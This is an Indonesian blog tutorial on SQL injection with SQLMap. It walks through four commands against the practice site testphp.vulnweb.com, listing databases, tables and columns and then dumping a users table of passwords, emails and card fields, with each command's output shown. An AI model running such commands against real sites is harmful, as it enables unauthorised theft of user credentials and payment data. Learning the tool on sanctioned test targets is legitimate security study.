Tutorial Serangan SQL Injection Menggunakan SQLMap - MainSec
Home sql sql-i sqlmap Tool Tutorial Tutorial Serangan SQL Injection Menggunakan SQLMap

Jumat, 17 Januari 2025

Tutorial Serangan SQL Injection Menggunakan SQLMap

di

Tutorial Serangan SQL Injection Menggunakan SQLMap

SQLMap adalah alat open-source berbasis Python yang dirancang untuk mengidentifikasi dan mengeksploitasi celah keamanan pada aplikasi web melalui serangan injeksi SQL.

Fitur utamanya meliputi:

  • Deteksi otomatis parameter rentan.
  • Eksploitasi database secara mendalam.
  • Mendukung berbagai jenis database seperti MySQL, PostgreSQL, Oracle, dan lainnya.

Di sini admin akan memberikan tutorial cara menggunakan SQLMap untuk serangan metode SQL Injection secara otomatis dan efisien.

Perintah SQLMap

Ikuti langkah-langkah berikut ini:

  1. Mencari Nama Database 
    python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --dbs

    Output:

    [16:01:58] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

    Memindai URL target dan mencari daftar database yang tersedia.

  2. Mencari Informasi Table 
    python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --tables -D acuart

    Output:

    [16:07:13] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
  3. Mencari Daftar Kolom 
    python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --columns -D acuart -T users

    Output:

    [16:10:00] [INFO] fetching columns for table 'users' in database 'acuart'
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| name    | varchar(100) |
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+
  4. Dump Informasi dalam Database 
    python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --dump -D acuart -T users

    Output:

    Database: acuart
Table: users
[1 entry]
+------+----------------------------------+------+---------------------+-------+-------+--------+
| cc   | cart                             | pass | email               | phone | uname | name   |
+------+----------------------------------+------+---------------------+-------+-------+--------+
| 8600 | 598f43e80587a7551a2353d75f0d7ce0 | test | demotest12@test.com | 93661 | test  | Sudais |
+------+----------------------------------+------+---------------------+-------+-------+--------+

 
Halo Sehat